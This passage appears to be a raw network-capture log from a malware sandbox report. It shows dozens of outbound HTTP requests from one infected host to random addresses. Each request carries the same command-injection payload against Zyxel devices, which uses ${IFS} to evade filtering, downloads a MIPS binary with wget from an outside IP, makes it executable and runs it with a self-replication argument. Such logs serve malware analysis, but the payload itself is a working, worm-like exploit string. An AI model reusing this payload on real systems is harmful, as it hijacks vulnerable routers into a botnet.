                                                  Jan 19, 2024 18:24:03.196851969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6268192.168.2.1358152156.90.19.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196899891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6269192.168.2.1338846172.53.201.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196940899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6270192.168.2.135658897.125.107.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196974039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6271192.168.2.1358002164.131.72.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197005033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6272192.168.2.135505241.192.176.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197057962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6273192.168.2.135681060.59.123.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197088957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6274192.168.2.134811238.19.97.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197123051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6275192.168.2.1357526116.1.244.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197158098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6276192.168.2.1339046158.90.85.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197189093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6277192.168.2.1340538212.129.103.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197223902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6278192.168.2.1352054159.117.3.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197278976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6279192.168.2.135065064.114.43.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197340012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6280192.168.2.13402129.197.92.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197379112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6281192.168.2.1355902182.214.85.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197426081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6282192.168.2.1337218123.152.178.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197462082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6283192.168.2.1350362199.17.149.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197510958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6284192.168.2.1357754179.15.28.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197545052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6285192.168.2.1337350106.143.123.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197596073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6286192.168.2.1343936149.48.145.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197637081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6287192.168.2.1338112149.75.225.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197660923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6288192.168.2.135715667.206.229.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197699070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6289192.168.2.1355656188.78.99.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197736979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6290192.168.2.136048843.76.218.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197777033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6291192.168.2.134711293.222.237.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197829008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6292192.168.2.1350792210.115.191.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197855949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6293192.168.2.1337182165.136.201.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197904110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6294192.168.2.136048892.105.210.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197959900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6295192.168.2.1352238219.102.64.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.197983027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6296192.168.2.135751492.179.248.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198012114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6297192.168.2.1333660185.192.2.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198051929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6298192.168.2.1350068105.253.87.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198076010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6299192.168.2.133603097.12.254.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198108912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6300192.168.2.1346788132.150.31.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198139906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6301192.168.2.133536093.135.66.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198195934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6302192.168.2.1339866222.118.254.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198241949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6303192.168.2.133851281.153.101.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198266029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6304192.168.2.1339718168.44.213.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198312998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6305192.168.2.134243049.233.148.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198350906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6306192.168.2.133482288.187.122.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198396921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6307192.168.2.1346340164.38.75.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198435068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6308192.168.2.1359468170.247.66.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198466063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6309192.168.2.133771878.234.112.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198502064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6310192.168.2.1334766147.46.211.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198566914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6311192.168.2.1342022100.170.169.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198586941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6312192.168.2.1352896143.210.138.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198632956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6313192.168.2.1350588150.82.188.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198677063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6314192.168.2.1336408101.205.26.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198723078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6315192.168.2.1334474120.160.161.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198767900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6316192.168.2.134912498.123.234.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198817015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6317192.168.2.1352280180.254.52.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198847055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6318192.168.2.1340834149.132.79.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198890924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6319192.168.2.135093682.22.68.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198932886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6320192.168.2.134592681.177.59.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.198966026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6321192.168.2.135666027.37.106.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199018955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6322192.168.2.1357738141.229.24.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199050903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6323192.168.2.1352806117.176.253.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199088097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6324192.168.2.135881297.162.208.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199129105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6325192.168.2.1338000160.12.168.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199186087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6326192.168.2.1343712150.128.34.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199233055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6327192.168.2.134497866.242.46.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199268103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6328192.168.2.1349054208.124.198.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199316025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6329192.168.2.1333898184.247.56.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.199356079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6330192.168.2.133973072.99.243.189443
                                                  TimestampBytes transferredDirectionData
